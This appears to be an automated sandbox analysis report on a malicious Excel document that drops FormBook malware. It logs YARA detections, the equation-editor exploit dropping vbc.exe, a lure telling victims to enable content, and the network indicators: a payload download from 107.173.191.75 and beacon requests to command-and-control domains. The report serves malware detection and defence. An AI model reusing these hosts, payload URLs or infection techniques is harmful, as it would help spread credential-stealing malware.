      Source: EXCEL.EXE, 00000000.00000002.687693304.0000000005307000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.499463550.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
      Source: explorer.exe, 00000006.00000000.531356125.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
      Source: explorer.exe, 00000006.00000000.493469713.0000000004399000.00000004.00000001.sdmpString found in binary or memory: http://www.mozilla.com0
      Source: EXCEL.EXE, 00000000.00000002.687513423.0000000005120000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.528721020.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
      Source: explorer.exe, 00000006.00000000.495771332.0000000008414000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.504413647.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.501565204.0000000004513000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
      Source: explorer.exe, 00000006.00000000.495771332.0000000008414000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.504413647.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.501565204.0000000004513000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
      Source: explorer.exe, 00000006.00000000.528721020.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\42A24FD9.emfJump to behavior
      Source: unknownDNS traffic detected: queries for: www.travelgleam.com
      Source: global trafficHTTP traffic detected: GET /dodge/winlogon.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.173.191.75Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /hf9j/?NnwLW=lTeXzRfHoPHDqpa&LnftM=Hi4i/MzZWraYpeia3tFw/razG0ol5F63XlO+NDDVDOKGXMifKzAuqwSCBSP91u5pGStR7A== HTTP/1.1Host: www.travelgleam.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hf9j/?LnftM=Pqr9SePoNfnaC1kg2G0jCGwXX1ba57NV0gLvpt/5y4PrrRm7oBIm/XhJEBzYJkmjKkGOCg==&NnwLW=lTeXzRfHoPHDqpa HTTP/1.1Host: www.sdffzc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00404E07 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000005.00000002.541290495.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.683120830.00000000003C0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000001.481627227.0000000000400000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.543081272.0000000002590000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000000.512689943.00000000097D3000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.682689101.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000000.505045943.00000000097D3000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000000.480383682.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000000.481156695.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.682544135.0000000000090000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.541124552.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.484497263.0000000001E90000.00000004.00000001.sdmp, type: MEMORY

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 00000005.00000002.541290495.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000005.00000002.541290495.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000007.00000002.683120830.00000000003C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000007.00000002.683120830.00000000003C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000005.00000001.481627227.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000005.00000001.481627227.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000005.00000002.543081272.0000000002590000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000005.00000002.543081272.0000000002590000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000006.00000000.512689943.00000000097D3000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000000.512689943.00000000097D3000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000007.00000002.682689101.00000000001E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000007.00000002.682689101.00000000001E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000006.00000000.505045943.00000000097D3000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000000.505045943.00000000097D3000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000005.00000000.480383682.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000005.00000000.480383682.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000005.00000000.481156695.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000005.00000000.481156695.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000007.00000002.682544135.0000000000090000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000007.00000002.682544135.0000000000090000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000005.00000002.541124552.00000000001C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000005.00000002.541124552.00000000001C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000004.00000002.484497263.0000000001E90000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000004.00000002.484497263.0000000001E90000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
      Source: Screenshot number: 8Screenshot OCR: enable Editing and Content from the Yellow bar 21 above to view locked content. 22 ,, 24 25 "
      Office equation editor drops PE fileShow sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlogon[1].exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: 00000005.00000002.541290495.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000002.541290495.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000007.00000002.683120830.00000000003C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000007.00000002.683120830.00000000003C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000005.00000001.481627227.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000001.481627227.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000005.00000002.543081272.0000000002590000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000002.543081272.0000000002590000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000006.00000000.512689943.00000000097D3000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000000.512689943.00000000097D3000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000007.00000002.682689101.00000000001E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000007.00000002.682689101.00000000001E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000006.00000000.505045943.00000000097D3000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000000.505045943.00000000097D3000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000005.00000000.480383682.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000000.480383682.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000005.00000000.481156695.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000000.481156695.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000007.00000002.682544135.0000000000090000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000007.00000002.682544135.0000000000090000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000005.00000002.541124552.00000000001C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000002.541124552.00000000001C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000004.00000002.484497263.0000000001E90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000004.00000002.484497263.0000000001E90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004030E3 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_022166E8
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_022166F3
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_02216340
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_02216743
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_02216753
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00406043
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00404618
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0040681A
      Source: C:\Users\Public\vbc.exeCode function: 4_2_1000CA10
      Source: C:\Users\Public\vbc.exeCode function: 4_2_1001707B
      Source: C:\Users\Public\vbc.exeCode function: 4_2_1001FC94
      Source: C:\Users\Public\vbc.exeCode function: 4_2_1001756F
      Source: C:\Users\Public\vbc.exeCode function: 4_2_10017987
      Source: C:\Users\Public\vbc.exeCode function: 4_2_10017DBC
      Source: C:\Users\Public\vbc.exeCode function: 4_2_100181F1
      Source: C:\Users\Public\vbc.exeCode function: 4_2_10020206
      Source: C:\Users\Public\vbc.exeCode function: 4_2_100222C3
      Source: C:\Users\Public\vbc.exeCode function: 4_2_10015AF9
      Source: C:\Users\Public\vbc.exeCode function: 4_2_10020F20
      Source: C:\Users\Public\vbc.exeCode function: 4_2_1001D36E
      Source: C:\Users\Public\vbc.exeCode function: 4_2_10020778
      Source: C:\Users\Public\vbc.exeCode function: 5_2_00401030
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B8C3
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C090
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0040120B
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C394
      Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C7B
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C4D0
      Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C80
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0041CC86
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0041BD0F
      Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D8E
      Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D90
      Source: C:\Users\Public\vbc.exeCode function: 5_2_00402FB0
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007C905A
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007B3040
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007DD005
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007AE0C6
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007AE2E9
      Source: C:\Users\Public\vbc.exeCode function: 5_2_00851238
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007FA37B
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007B7353
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007B2305
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007D63DB
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007AF3CF
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007ED47D
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007C1489
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007E5485
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007F6540
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007B351F
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007CC5F0
      Source: C:\Users\Public\vbc.exeCode function: 5_2_00852622
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007BE6C1
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007B4680
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0083579A
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007E57C3
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007BC7BC
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007D286D
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007BC85C
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0084F8EE
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0085098E
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007C69FE
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007B29B2
      Source: C:\Users\Public\vbc.exeCode function: 5_2_00835955
      Source: C:\Users\Public\vbc.exeCode function: 5_2_00863A83
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0085CBA4
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0083DBDA
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007D7B00
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007AFBD7
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007BCD5B
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007E0D3B
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0084FDDD
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007CEE4C
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007E2E2F
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007DDF7C
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007C0F3F
      Source: C:\Users\Public\vbc.exeCode function: 5_1_00401030
      Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B8C3
      Source: C:\Users\Public\vbc.exeCode function: 5_1_0041C090
      Source: C:\Users\Public\vbc.exeCode function: 5_1_0040120B
      Source: C:\Users\Public\vbc.exeCode function: 5_1_0041C394
      Source: C:\Users\Public\vbc.exeCode function: 5_1_00408C7B
      Source: C:\Users\Public\vbc.exeCode function: 5_1_0041C4D0
      Source: C:\Users\Public\vbc.exeCode function: 5_1_00408C80
      Source: C:\Users\Public\vbc.exeCode function: 5_1_0041CC86
      Source: C:\Users\Public\vbc.exeCode function: 5_1_0041BD0F
      Source: C:\Users\Public\vbc.exeCode function: 5_1_00402D8E
      Source: C:\Users\Public\vbc.exeCode function: 5_1_00402D90
      Source: C:\Users\Public\vbc.exeCode function: 5_1_00402FB0
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025A1238
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024FE2E9
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02507353
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0254A37B
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02502305
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024FF3CF
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025263DB
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0251905A
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02503040
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0252D005
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024FE0C6
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025A2622
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250E6C1
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02504680
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025357C3
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0258579A
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250C7BC
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0253D47D
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02535485
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02511489
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02546540
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250351F
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0251C5F0
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025B3A83
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02527B00
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0258DBDA
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024FFBD7
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025ACBA4
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250C85C
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0252286D
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0259F8EE
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02585955
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025169FE
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025A098E
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025029B2
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0251EE4C
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02532E2F
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0252DF7C
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02510F3F
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250CD5B
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02530D3B
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0259FDDD
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_000AC090
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_000AC4D0
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_000AB8C3
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00098C7B
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00098C80
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_000ACC86
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_000ABD0F
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00092D8E
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00092D90
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00092FB0
      Source: C:\Users\Public\vbc.exeCode function: String function: 007ADF5C appears 118 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 007F373B appears 238 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 0081F970 appears 81 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 007F3F92 appears 108 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 0041A4C0 appears 38 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 007AE2A8 appears 38 times
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 024FDF5C appears 117 times
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 024FE2A8 appears 38 times
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0256F970 appears 81 times
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0254373B appears 238 times
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 02543F92 appears 108 times
      Source: C:\Users\Public\vbc.exeCode function: 5_2_004185E0 NtCreateFile,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_00418690 NtReadFile,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_00418710 NtClose,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_004187C0 NtAllocateVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_004187BC NtAllocateVirtualMemory,
